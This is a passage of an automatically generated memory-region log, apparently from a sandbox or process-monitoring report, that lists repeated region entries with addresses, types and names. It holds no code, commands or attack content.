"pagefile_0x0000000000400000" filename = "" Region: id = 8716 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8717 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8718 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8719 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8720 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8721 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8722 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8723 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8724 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8725 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8726 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8727 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8728 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8729 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8730 start_va = 0x10250000 end_va = 0x10741fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010250000" filename = "" Region: id = 8731 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8732 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8733 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8734 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8735 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8736 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8737 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8738 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8739 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8740 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8741 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8742 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8743 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8744 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8745 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8746 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8747 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8748 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8749 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8750 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8751 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8752 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8753 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8754 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8755 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8756 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8757 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8758 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8759 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8760 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8761 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8762 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8763 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8764 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8765 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8766 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8767 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8768 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8769 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8770 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8771 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8772 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8773 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8774 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8775 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8776 start_va = 0x460000 end_va = 0x461fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 8777 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8778 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8779 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8780 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8781 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8782 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8783 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8784 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8785 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8786 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8787 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8788 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8789 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8790 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8791 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8792 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8793 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8794 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8795 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8796 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8797 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8798 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8799 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8800 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8801 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8802 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8803 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8804 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8805 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8806 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8807 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8808 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8809 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8810 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8811 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8812 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8813 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8814 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 8815 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8816 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8817 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8818 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8819 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8820 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8821 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8822 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8823 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8824 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8825 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8826 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8827 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8828 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8829 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8830 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8831 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8832 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8833 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8834 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8835 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8836 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8837 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8838 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8839 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8840 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8841 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8842 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8843 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8844 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8845 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8846 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8847 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8848 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8849 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8850 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8851 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8852 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8853 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 8854 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8855 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8856 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8857 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8858 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8859 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8860 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8861 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8862 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8863 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8864 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8865 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8866 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8867 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8868 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8869 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8870 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8871 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8872 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8873 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8874 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8875 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8876 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8877 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8878 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8879 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8880 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8881 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8882 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8883 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8884 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8885 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8886 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8887 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8888 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8889 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8890 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8891 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8892 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8893 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8894 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8895 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8896 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8897 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8898 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8899 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8900 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8901 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8902 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8903 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8904 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 8905 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" 